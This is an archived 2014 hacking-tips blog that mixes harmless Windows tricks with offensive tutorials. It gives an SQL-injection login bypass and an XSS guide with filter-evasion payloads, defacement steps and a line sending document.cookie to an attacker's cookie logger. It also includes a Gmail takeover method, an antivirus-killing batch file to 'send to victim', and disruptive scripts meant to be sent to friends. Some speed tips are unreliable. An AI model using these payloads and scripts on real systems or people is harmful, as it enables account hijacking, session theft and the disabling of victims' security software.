Spy'D HackZ: June 2014

Monday 30 June 2014

How To Create Undeletable And Unrenamable Folders ?

1. Go to Start and then Click on Run
-Type cmd & hit enter (To open Command Prompt ).

2. Remember you cannot create Undeletable & unrenamable folder in your root directory (i.e. where the windows is installed) That means you can't make this kind of folder in C: drive if you installed windows on C:

3. Type D: or E: and hit enter

4. Type md con\ and hit enter (md - make directory)

5. You may use other words such as aux, lpt1, lpt2, lpt3 up to lpt9 instead of con in above step.

6. Open that directory, you will see the folder created of name con.

7. Try to delete that folder or rename that folder windows will show the error message.

Now the question is how to delete it when you really need to do?

1. Open Command Prompt

2. Type D: ( if u created this type of folder in D: drive) & hit enter Type rd con\ (rd - remove directory)

3. Open that directory and the folder will not appear because it is removed.

NOTE : .This is for those who aren't aware of this trick :))

RUN Commands

________________________________________
Run Commands

-----------------------------------------------------------
START >> RUN
Accessibility Controls
access.cpl
Add Hardware Wizard
hdwwiz.cpl
Add/Remove Programs
appwiz.cpl
Administrative Tools
control.exe admintools
Automatic Updates
wuaucpl.cpl
Bluetooth Transfer Wizard
fsquirt
Calculator
calc
Certificate Manager
certmgr.msc
Character Map
charmap
Check Disk Utility
chkdsk
Clipboard Viewer
clipbrd
Command Prompt
cmd
Component Services
dcomcnfg
Computer Management
compmgmt.msc
Date and Time Properties
timedate.cpl
DDE Shares
ddeshare
Device Manager
devmgmt.msc
Direct X Control Panel (if installed)
directx.cpl
Direct X Troubleshooter
dxdiag
Disk Cleanup Utility
cleanmgr
Disk Defragment
dfrg.msc
Disk Management
diskmgmt.msc
Disk Partition Manager
diskpart
Display Properties
control.exe desktop
Display Properties
desk.cpl
Display Properties (w/Appearance Tab Preselected)
control.exe color
Dr. Watson System Troubleshooting Utility
drwtsn32
Driver Verifier Utility
verifier
Event Viewer
eventvwr.msc
File Signature Verification Tool
sigverif
Findfast
findfast.cpl
Folders Properties
control.exe folders
Fonts
control.exe fonts
Fonts Folder
fonts
Free Cell Card Game
freecell
Game Controllers
joy.cpl
Group Policy Editor (XP Prof)
gpedit.msc
Hearts Card Game
mshearts
Iexpress Wizard
iexpress
Indexing Service
ciadv.msc
Internet Properties
inetcpl.cpl
Java Control Panel (if installed)
jpicpl32.cpl
Java Control Panel (if installed)
javaws
Keyboard Properties
control.exe keyboard
Local Security Settings
secpol.msc
Local Users and Groups
lusrmgr.msc
Logs You Out Of Windows
logoff
Microsoft Chat
winchat
Minesweeper Game
winmine
Mouse Properties
control.exe mouse
Mouse Properties
main.cpl
Network Connections
control.exe netconnections
Network Connections
ncpa.cpl
Network Setup Wizard
netsetup.cpl
Nview Desktop Manager (if installed)
nvtuicpl.cpl
Object Packager
packager
ODBC Data Source Administrator
odbccp32.cpl
On Screen Keyboard
osk
Opens AC3 Filter (if installed)
ac3filter.cpl
Password Properties
password.cpl
Performance Monitor
perfmon.msc
Performance Monitor
perfmon
Phone and Modem Options
telephon.cpl
Power Configuration
powercfg.cpl
Printers and Faxes
control.exe printers
Printers Folder
printers
Private Character Editor
eudcedit
Quicktime (If Installed)
QuickTime.cpl
Regional Settings
intl.cpl
Registry Editor
regedit
Registry Editor
regedit32
Removable Storage
ntmsmgr.msc
Removable Storage Operator Requests
ntmsoprq.msc
Resultant Set of Policy
rsop.msc
Resultant Set of Policy (XP Prof)
rsop.msc
Scanners and Cameras
sticpl.cpl
Scheduled Tasks
control.exe schedtasks
Security Center
wscui.cpl
Services
services.msc
Shared Folders
fsmgmt.msc
Shuts Down Windows
shutdown
Sounds and Audio
mmsys.cpl
Spider Solitare Card Game
spider
SQL Client Configuration
cliconfg
System Configuration Editor
sysedit
System Configuration Utility
msconfig
System File Checker Utility
sfc
System Properties
sysdm.cpl
Task Manager
taskmgr
Telnet Client
telnet
User Account Management
nusrmgr.cpl
Utility Manager
utilman
Windows Firewall
firewall.cpl
Windows Magnifier
magnify
Windows Management Infrastructure
wmimgmt.msc
Windows System Security Tool
syskey
Windows Update Launches
wupdmgr
Windows XP Tour Wizard
tourstart
Wordpad
write
Try them out..

Increase Virtual RAM and Make Your System Faster.

Step 1 – Right Click on My Computer and Select Properties .

Step 2 – Now Click on the Advanced Tab.

Step 3 – Now Under Performance Tab click on Settings .

virtuStep 4 – Click on Advanced Tab on the Button that Pops up .

Step 5 – Now Under Virtual Memory Click on Change >- Custom Size.

Step 6 – For the initial size (depending on your HD space), type in anywhere from 1000-1500 ,and for the Maximum size type in anywhere from 2000-2500.

Step 7 – Now Click on Set and then exit out of all the windows.

Step 8 – Restart your Computer and now you have faster computer and 1-2 GB Virtual RAM

Tips to increase internet speed

I just found this good tips from my ISP. I am sure it works for you.

Here's a simple little thing you can do to increase your bandwidth by at least 20%.

Ok here we go...

1.) log on as Administrator.

2.) start - run - type gpedit.msc

3.) expand "local computer policy"

4.) then expand "administrative templates"

5.) then expand "network branch"

6.) Highlight the "QoS Packet Scheduler"

7.) on right window double click "limit reservable bandwidth"

8.) on setting tab check the "enabled"

9.) change "Bandwidth limit %" to 0

You're done.It would be a good idea to reboot after this.

Tuesday 24 June 2014

Hackers Types

Hackers are three types:-

1. White hat hacker

2. Gray hat hacker

3. Black hat hacker

White Hat and Grey Hat Hacker & What is the Real Difference?

What is worse, the public is not able to understand terms like grey hat, white hat, Linux OS, or cracker.
However, the truth is that the subculture of the hacker world is more complex than we think. Especially if we consider that, these are very intelligent people.

So, what is ethical hacking white hat and how does it differentiate from grey hackers? The only way to find out is to submerge ourselves in the world of hackers and understand, at least, the most basic concepts.

What Is A White Hat Hacker?

A hacker can be a wiz kid who spends too much time with computers and suddenly finds himself submerged in the world of cyber-security or criminal conspirators. On the other hand, he can be a master criminal who wants to obtain huge amounts of money for him, or even worse, dominate the world.

In the movie Matrix, the concept of hackers changed a bit. Although the agents of the Matrix considered them terrorists, the truth is that they were rebels fighting for the liberty of humanity. Things do not need to reach that extreme, though. We are not at war with intelligent ma chines so that kind of scenario is a bit dramatic.

Therefore, a hacker is an individual who is capable of modifying computer hardware, or software. They made their appearance before the advent of computers, when determined individuals were fascinated with the possibility of modifying machines. For example, entering a determine code in a telephone in order to make free international calls.

When computers appeared, this people found a new realm where they could exploit their skills. Now they were not limited to the constraints of the physical world, instead, they could travel through the virtual world of computers. Before the internet, they used Bulletin Board Systems (BBS) to communicate and exchange information. However, the real explosion occurred when the Internet appeared.

Today, anyone can become a hacker. Within that denomination, there are three types of hackers. The first one is the black hacker, also known as a cracker, someone who uses his computer knowledge in criminal activities in order to obtain personal benefits. A typical example is a person who exploits the weaknesses of the systems of a financial institution for making some money.

On the other side is the white hat hacker. Although white hat hacking can be considered similar to a black hacker, there is an important difference. A white hacker does it with no criminal intention in mind. Companies around the world, who want to test their systems, contract white hackers. They will test how secure are their systems, and point any faults that they may found. If you want to become a hacker with a white hat, Linux, a PC and an internet connection is all you need.

Grey Hat Hackers

A grey hat hacker is someone who is in between these two concepts. He may use his skills for legal or illegal acts, but not for personal gains. Grey hackers use their skills in
order to prove themselves that they can accomplish a determined feat, but never do it in order to make money out of it. The moment they cross that boundary, they become black hackers.

For example, they may hack the computer network of a public agency, let us say, NOAA. That is a federal crime.

If the authorities capture them, they will feel the long arm of justice. However, if they only get inside, and post, let us say, their handle, and get out without causing any kind of damage, then they can be considered grey hackers.

If you want to know more about hackers, then you can attend one of their annual conventions. Every year, hackers from all over the US, and from different parts of the world, reunite and meet at DEF CON. These conventions are much concurred. In the last one, 6,600 people attended it.

Every year, DEF CON is celebrated at Las Vegas, Nevada. However, hackers are not the only ones who go to this event. There are also computer journalists, computer security professionals, lawyers, and employees of the federal government. The event is composed by tracks of different kind, all of them related, in some way, to the world of hackers (computer security, worms, viruses, new technologies, coding, etc). Besides the tracks, there are contests that involve hacking computers, l ock picking and even robot related events. Ethical hacking, white hat hacking or whatever names you wish to use, at the end, it has a purpose: to protect the systems of organizations, public or private, around the world. After all, hackers can now be located anywhere, and they can be counted by the millions. Soon, concepts like white hat, linux operating system or grey hat will become common knowledge. A real proof of how much has our society been influenced by technology.

Black Hat Hackers

Black hat hackers have become the iconic image of all hackers around the world. For the majority of computer users, the word hacker has become a synonym for social misfits and criminals.
Of course, that is an injustice created by our own interpretation of the mass media, so it is important for us to learn what a hacker is and what a black hacker (or cracker) does. So, let's learn about black hat techniques and how they make our lives a little more difficult.
Black hat is used to describe a hacker (or, if you prefer, cracker) who breaks into a computer system or network with malicious intent. Unlike a white hat hacker, the black hat hacker takes advantage of the break-in, perhaps destroying files or stealing data for some future purpose. The black hat hacker may also make the exploit known to other hackers and/or the public without notifying the victim. This gives others the opportunity to exploit the vulnerability before the organization is able to secure it.

What Is Black Hat Hacking?

A black hat hacker, also known as a cracker or a dark side hacker (this last definition is a direct reference to the Star Wars movies and the dark side of the force), is someone who uses his skills with a criminal intent. Some examples are: cracking bank accounts in order to make transfernces to their own accounts, stealing information to be sold in the black market, or attacking the computer network of an organization for money.

Some famous cases of black hat hacking include Kevin Mitnick, who used his black hat hackers skills to enter the computers of organizations such as Nokia, Fujitsu, Motorola and Sun Microsystems (it must be mentioned that he is now a white hat hacker); Kevin Poulsen, who took control of all the phone lines in Los Angeles in order to win a radio contest (the prize was a Porsche 944 S2); and Vladimir Levin, which is the handle of the mastermind behind the stealing of $10'000,000 to Citigrou.

Chat with Friends through Command Prompt

Hello friends Now U Can Chat With Command Prompt THrough So Here IS A Trick.....

1) All you need is your friend's IP Address and your Command Prompt.

2) Open Notepad and write this code as it is.....!

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

3) Now save this as "Messenger.Bat".

4) Open Command Prompt.

5) Drag this file (.bat file) over to Command Prompt and press Enter.

6) Now, type the IP Address of the computer you want to contact and press enter
You will see something like this:

8) Now all you need to do is type your message and press Enter.
Start Chatting.......!

DONE....ENJOY.~!!

Lock Your Files Without Any Software

1. Open Notepad and Copy code given below into it.

    cls
    @ECHO OFF
    title coolhacking-tricks.blogspot.com
    if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
    if NOT EXIST MyFolder goto MDMyFolder
    :CONFIRM
    echo Are you sure to lock this folder? (Y/N)
    set/p "cho=>"
    if %cho%==Y goto LOCK
    if %cho%==y goto LOCK
    if %cho%==n goto END
    if %cho%==N goto END
    echo Invalid choice.
    goto CONFIRM
    :LOCK
    ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
    attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
    echo Folder locked
    goto End
    :UNLOCK
    echo Enter password to Unlock Your Secure Folder
    set/p "pass=>"
    if NOT %pass%== likehacking goto FAIL
    attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
    ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
    echo Folder Unlocked successfully
    goto End
    :FAIL
    echo Invalid password
    goto end
    :MDMyFolder
    md MyFolder
    echo MyFolder created successfully
    goto End
    :End

   2. Save the notepad file as lock.bat (.bat is must)
   3. Now double click on lock.bat and a new folder will be created with name MyFolder
   4. Copy all your data you want to protect in that New folder
   5. Now double click on lock.bat and when command promp appears Type Y and press enter.
   6. Now MyFolder will be hidden from you view, to access that folde double click on lock.bat
   7. It will ask for password enter your password and done. (Default password is likehacking)

    To change the password replace coolhacks with new password in the above code

Tips to increase internet speed

How to Hack a Website with Basic HTML Coding

If you have basic HTML and JavaScript knowledge, you may be able to access password protected websites. This article will give you an easy method to hack simple, less-secured
websites of your choice simply through HTML. Use it responsibly.

Note : This basic method works

only for websites with extremely low security barriers. Websites with robust security details will not be susceptible to this kind of simple attack. Ad Open the site you want
to hack . Provide wrong username/password combination in its log in form. (e.g. : Username :
me and Password: ' or 1=1 --)An error will occur saying wrong username-password. Now be prepared your experiment starts from here. Right click anywhere on that error page =>> go to view source. There you can see the HTML coding with JavaScript .• There you
find somewhat like this....<_form action="...Login....">• Before this login information copy the URL of the site in which you are.

(e.g. :"< _form..........action=http://www.targetwebsite.com/
login .......>")

Then delete theJavaScript from the above that validates your information in the server .
(Do this very carefully, your success to hack the site depends upon this i.e. how efficiently you delete the java scripts that validate your account information) Then take a close look
for "<_input name="password" type="password">"[without quotes] -> replace
"<_type=password>" with "<_type=text>" . See there if maximum length of
password is less than 11 then increase it to 11
(e.g. : if then write )
Just go to file => save as and save it anywhere in your hard disk with ext .html(e.g.: c:
\chan.html) Reopen your target web page by double clicking 'chan .html' file that you
saved in your hard disk earlier.• You see that some changes in current page as compared to
original One. Don't worry Provide any username [e .g.: hacker] and
password [e.g.:' or 1=1 --] You have successfully cracked the above website and
entered into the account of List user saved in the server's database.

Here we tells about PHISHING & How can we protect from it

>>WHAT IS PHISHING:-

The act of sending an e-mail to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the user into surroundering private information that will be used for identity theft. The e-mail directs the user to visit a Web site where they are asked to update personal information, such as passwords and credit card, social security, and bank account numbers, that the legitimate organization already has. The Web site, however, is bogus and set up only to steal the user’s information.

>>MOBILE PHISHING:

Phishing scams are not limited to the internet. Some phishers use the telephone to make requests for information. If you get a call from your banking institution asking for personal information, hang up and call your bank directly. Your bank will have your social security number and account information on file and should only ask you to verify a few digits.

like Iphone,Apple ,iTunes n more...By SMS

EXAMPLE:-

>>Congratulations! Your mobile phone has won US$ 10 Million prize money. To claim your money, call this number XXXXXXXX,give your permanent address,pin number,account number or credit card number...

The phisher can ask like it They want your personal Information.

Some people do the reply to phisher then after he/she can be target of Phisher... so never be reply these type of Messages or Mail.

In a phishing attack, the attacker creates a situation wherein people believe that they are dealing with an authorized party, like their bank or another service provider. The attacker will ask the victim for sensitive information such as credit card information.

>>Phishing attacks generally target:

    * Bank information – e.g. VISA and PayPal accounts.
    * Username and password information.
    * Social Security numbers.
    * Information which can be used to retrieve forgotten or lost credentials.

>>Follow the tips below to protect yourself against these threats:

· Your bank will never ask you to divulge account information or passwords via email. Never give out this information, especially via email.

· Don’t open emails that come from untrusted sources.

· Don’t run files that you receive via email without making sure of their origin.

· Don’t click links in emails. If they come from a known source, type them on the browser’s address bar. If they come from an untrusted source, simply ignore them, as they could take you to a web designed to download malware onto your computer.

· Keep your computer protected. Install a security solution and keep it up-to-date.

>>Protect yourself from Phishing scams that could lead to identity theft. I cannot stress this enough. Phishing scams are a hot topic lately that have grown with the popularity of online banking and social networking sites like MySpace, Facebook and Friendster.

The term Phishing comes from the analogy to "fishing". The phisher uses a bait to lure victims into giving out personal information like passwords and credit card numbers. The bait is typically and urgent plea from one of the victims friends or trusted websites, asking for information to resolve some sort of problem with their account.

>>Anti-phishing software is a must for anyone that accesses the internet. Most of the internet service providers have some safety measures included as part of their online security software. Most web browsers also have add-ons that can detect most phishing scams. Unfortunately, these measures are not enough. Some of the more clever phishers have found ways to trick the anti-phishing software so you need to be cautious of suspicious emails and messages.

Monday 23 June 2014

To Block Website

>>>Steps

1] Browse C:\WINDOWS\system32\drivers\etc

2] Find the file named "HOSTS"

3] Open it in notepad

4] Under "127.0.0.1 localhost" Add 127.0.0.2 www.orkut.com , and that site will no longer be accessable.

5] Done!

example :

127.0.0.1 localhost

127.0.0.2 www.orkut.com

www.orkut.com is now unaccessable

For every site after that you want to add, just add "1" to the last number in the internal ip (127.0.0.2) and then the addy like before.

ie:

127.0.0.3 www.yahoo.com

127.0.0.4 www.msn.com

127.0.0.5 www.google.com

This also works with banner sites, just find the host name of the server with the banners and do the same thing with that addy.

Hope this small tutorial could keep you going in simple way of blocking websites..

Cross Site Scripting (XSS)

XSS' also known as 'CSS' - Cross Site Scripting. It is a very common vulnerability
found in Web Applications, 'XSS' allows the attacker to INSERT malicous code, There are many types of XSS attacks, I will mention 3 of the most used. This kind of vulnerability allows an "attacker" to inject some code into the applications affected in order to bypass access to the website or to apply "phishing" on falls users.
This technique is also used for website Hacking.

Types of XSS:
There are actually three types of Cross-Site Scripting, commonly named as:

DOM-Based XSS
Non-persistent XSS
Persistent XSS

DOM-Based : The DOM-Based Cross-Site Scripting allow to an attacker to work not on a victim website but on a victim local machine: the various operative system usually includes "since born" some HTML pages created for differents aims, but as long as the humans do mistakes this HTML pages often can be exploited due to code vulnerabilities.

The DOM-Based XSS exploits these problems on users local machines in this way:
- The attacker creates a well builded malicious website
- The ingenuous user opens that site
- The user has a vulnerable page on his machine
- The attacker's website sends commands to the vulnerable HTML page
- The vulnerable local page execute that commands with the user's privileges
on that machine.
- The attacker easily gain control on the victim computer.

Non-Persistent : The non-persistent XSS are actually the most commons vulnerabilities that can be found on the Net. It's commonly named as "non-persistent" because it works on an immediate HTTP response from the victim website: it show up when the webpage get the data provided by the attacker's client to automatically generate a result page for the attackers himself. Standing on this the attacker could provide some malicious code and try to make the server execute it in order to obtain some result.

The most common applying of this kind of vulnerability is in Search engines in website: the attacker writes some arbitrary HTML code in the search textbox and, if the website
is vulnerable, the result page will return the result of these HTML entities.

Persistent : The persistent XSS vulnerabilities are similar to the second type (Non-persistent XSS), because both works on a victim site and tries to hack users informations and the difference is that in websites vulnerables to Persistent XSS the attacker doesn't need to
provide the crafted url to the users, because the website itself permits to users to insert fixed data into the system: this is the case for example of "guestbooks". Usually the users uses
that kind of tool to leave messages to the owned
of the website and at a first look it doesn't seems something dangerous, but if an
attacker discover that the system is vulnerable can insert some malicious code in his
message and let ALL visitors to be victim of that.

This works when the tool provided (the guestbook in the example) doesn't do any
check on the content of the inserted message: it just inserts the data provided from
the user into the result page.

How to Find XSS Vulnerabilities:-

To start finding these Vulnerabilities you can start checking out Blogs, Forums, Shoutboxes, Comment Boxes, Search Box's, there are too many to mention.

Using 'Google Dorks' to make the finding easyier, Ok if you wanna get cracking, goto google.com and type inurl:"search.php?q=" now that is a common page and has alot
of results. Also note that most sites have XSS Vulnerabilities, its just having a good
eye, and some good knowledge on how to bypass there filteration.

Basics of XSS:
Well now lets start learning some Actual Methods, the most common used XSS
injection is :

<script>alert("Priyanshu")</script>

now this will alert a popup message, saying "Priyanshu" without quotes.

So,use "search.php?q=" and you can simple try the following on a website with the
same thing,

http://website.com/search.php?q=<script>alert("Priyanshu")</script>

There are good chances of it working, but dont be worried if it dont, just try diffrent sites. You can insert HTML not just javascript :

http://website.com/search.php?q=<br><br><b><u>Priyanshu</u></b>

if you see the bold text on the page and newlines then you knows its vulnerable.

How to Deface a Website using XSS ?
Well now you understand how XSS works, we can explain some simple XSS deface
methods, there are many ways for defacing i will mention some of the best and most used,
the first one being IMG SCR, now for those of you who dont know html, IMG SCR
is a tag, that displays the IMAGE linked to it on the webpage.

<html><body><IMG SRC="http://website.com/yourDefaceIMAGE.png"></body></html>

ok now if you change the link to a valid picture link, and save it and run it you will see what i mean. Right now say you have found a Shoutbox, Comment box, or anything
that shows your data after you submitted it you could insert the following to make the picture display on the page.

<IMG SRC="http://site.com/yourDefaceIMAGE.png">

The other tags are not needed has the page will already have them. Ok it helps to
make your picture big so it stands out and its clear the site got hacked. Another method is using FLASH videos, its the same has the method below but a more stylish deface.

<EMBED SRC="http://site.com/xss.swf"

That will execute the flash video linked to it. Or maybe using a pop or redirection as :
<script>window.open( "http://www.hackersonlineclub.tk/" )</script>

There are many others ways that you can found using Google or other website.
Mine purpose is to make you understand the concept :)

How to Cookie Stealing using XSS ?
I decided to add this has its the most usefull method of XSS. First learn how to make
cookie logger from here:

How To Make A Cookie Stealer Php script ?

ok now you have it save it has a .php file and upload to your server, remember to
create the file 'log.txt' too
and chmod it to 777, ok now find a XSS vulnerable website, any attack type will do.
ok now your gonna want to insert this code.

window.location = "http://yourServer.com/cookielogger.php?c="+document.cookie
or
document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie

now when user visits the page that got injected too, they will be sent to the site, and cookie will be stolen
the second one is more stealth. Watch your file now for cookies, then you can hijack there session :D

but now you ask what if my site has not got, this kind of attack, it only shows data once and dont store it. Well lets say we had a page search.php?q= we can use the following code to make a maliouc url from it and maybe hex, base64 encode it so people cant see the code

http://site.com/search.php?q=document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie

How to Bypass Filtration ?
Alot of sites may seem vulnerable but not executing the code, well to solve this read
this. Some common methods to bypass filtration is

')alert('xss');
or
");alert('xss');

that will do the same thing has <script>alert("XSS")</script> on a vulnerable server.
You can also try hexing or base64 encoding your data before you submit, Please note
its bad practice to use alert("XSS") to test for XSS, because some sites block the
keyword "XSS" before so we using "Priyanshu".

Some other ways to bypass filtration
website.com/search.php?q="><script>alert('Priyanshu')</script>
website.com/search.php?q="><script>alert("Priyanshu")</script>
website.com/search.php?q="><script>alert("Priyanshu");</script>
website.com/search.php?q="><script>alert(/Priyanshu");</script>
website.com/search.php?q=//"><script>alert(/Priyanshu/);</script>
website.com/search.php?q=xyz<script>alert(/Priyanshu/);</script>
website.com/search.php?q=xyz"><script>alert(/Priyanshu/);</script>
website.com/search.php?q=xyz"></script><script>alert(/Priyanshu/);</script>
website.com/search.php?q=000"><script></script><script>alert(Priyanshu);</script>
website.com/search.php?q=000xyz</script><script>alert(/Priyanshu/);</script>
website.com/search.php?q=--<script>"></script>alert(/Priyanshu/);</script>
website.com/search.php?q="><img src='javascript:alert('Priyanshu');'>
website.com/search.php?q="><script src='http://virus.js'</script>

Advanced XSS - way to bypass magic quotes filtration:
Ok now we are going to learn about some good techniqes. I have came across many
sites where 'Magic Quotes' is on and therfore rendering some commands useless. Fear not, i have come up with a way using char codes (Decimals), to convert char code to Ascii. The functions to turn CharCodes (Decimals) into ASCII, you can find a complete table here

http://www.asciitable.com/
http://easycalculation.com/

This will help you write what you want, In my examples ill be writing "HOC" this is the following code

72 79 67

Ok now we got the Decimal value of our string, we need to know what function in javascript converts this.

String.fromCharCode()

is suitable for this kinda things, its easy to setup, im gona give it my args below.

String.fromCharCode(72, 79, 67)

Ok now "String.fromCharCode(72, 79, 67)" Is a JAVA (ASCII) way of saying "HOC".
And to use this with alerts etc, you dont need to use quotes, as it acts as a variable.

<script>alert(String.fromCharCode(72, 79, 67))</script>

How To Hack a Gmail By a Hacker

Friends most of my friends lost there gmail IDs because of hacking. Don't worry
i didn't do that but there are many more who like hacking like me. But i do not want
to be harmful for anyone , i just want to tell the people the way of hacking, How a
hacker can hack you? , how can you save yourself from them. So today i'm going
to tell you how can you hack anyone gmail id or how can you save your's one?
Just see some simple steps

STEP 1.- First of all , a hacker will try to know you gmail id.
STEP 2.- Now , he'll click on Forget Password on gmail.com . Here he'll fill your
email id.
STEP 3.- After that there'll be two option to hack the account , the first one is mobile
number and the second one is your alternate email id or your security answer.
STEP 4.- Let assume that you want to hack your friends gmail id or your friends want
to hack your gmail id then he'll ask you for your phone for sometime. Once you'll
allow him then no one can save your gmail id. It'll surely going to be hacked. Let
me show you in next step how'll he hack your gmail id. STEP 6.- Now after doing
last 5 step, he'll fill your number and click on continue. After that google will send
a sms on your number with a code and when he'll fill that code there then google
will show you a page to set a new password. Now he'll set new password.
A confirmation mail will be sent to your atlernative email id. But he'll do something
wrong that will explained in next step
STEP 7.- Now he'll go to ACCOUNT section and change the recovery option.
E.g. He'll replace your number with
his private number and also change your alternative email with his email
STEP 8.- Now he'll come to you, and give your phone to you and say thanks with a
smiling face and you know what'll you say ? You'll say - your welcome, its my pleasure. . Ha ha ha. .

Learn Virus Writing Hear

All this comand use to type in notepad

How To Disable Victim Antivirus.

Open Notepad Copy it and Paste To Notepad

@ echo off
rem --
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem --

Now Save this code as .bat and send to victim :)

Tasks Kill

@echo off

start calc

tskill msnmsgr

tskill firefox

tskill iexplore

tskill LimreWire

tskill explorer

tskill explorer

tskill explorer

tskill explorer

tskill explorer

pause

save this as .bat file and send and destroy the victim & k!ll Operat!ng systeM!

Code type in notepad

@echo off
shutdown -r -f -t 00

>>Form Of Switches

-s
Shuts down the PC.

-l
Logs off the current user.

-t nn
Indicates the duration of delay, in seconds, before performing the action.

-c "messagetext"
Displays a message in the System Shutdown window. A maximum of 127 characters can be used. The message must be enclosed in quotation marks.

-f
Forces any running applications to shut down.

-r
Reboots the PC. ..!!..!

>>Popping CD Drives

*This will make the CD drives constantly pop out*

Code:-

Set oWMP = CreateObject(”WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop

To make your pc talk

Open a text file in notepad and write:

Dim msg, sapi
msg=InputBox("Enter your text","Talk it")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg

Save the file with a (*.vbs) extension, it will create a VBScript File.
It will prompt you for a text when u open the file, input the text and press ok."

u will hear now what u typed..

this works in xp, vista, win7 also.

Continually pop out your friend's CD Drive. If he / she has more than one,

it pops out all of them!
Type :

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save it as "Anything.VBS" and send it.

Toggle your friend's Caps Lock button simultaneously:

Type :

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save it as "Anything.VBS" and send it.

Convey your friend a lil' message and shut down his / her computer:

Type :

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it.

Frustrate your friend by making this VBScript hit Enter simultaneously:

Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.

Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak

your friend out:

Type :

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
